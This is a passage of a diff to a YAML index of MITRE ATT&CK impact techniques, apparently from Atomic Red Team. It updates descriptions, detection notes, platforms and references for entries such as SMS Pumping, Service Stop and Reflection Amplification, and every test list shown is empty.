+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -57528,13 +58285,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -57542,12 +58306,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57608,109 +58393,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57719,10 +58474,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57733,39 +58492,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57783,13 +58540,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57797,36 +58561,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57835,11 +58590,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57848,17 +58609,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57867,6 +58642,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57882,17 +58658,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57902,14 +58673,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57918,28 +58690,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57950,7 +58722,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57961,17 +58732,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
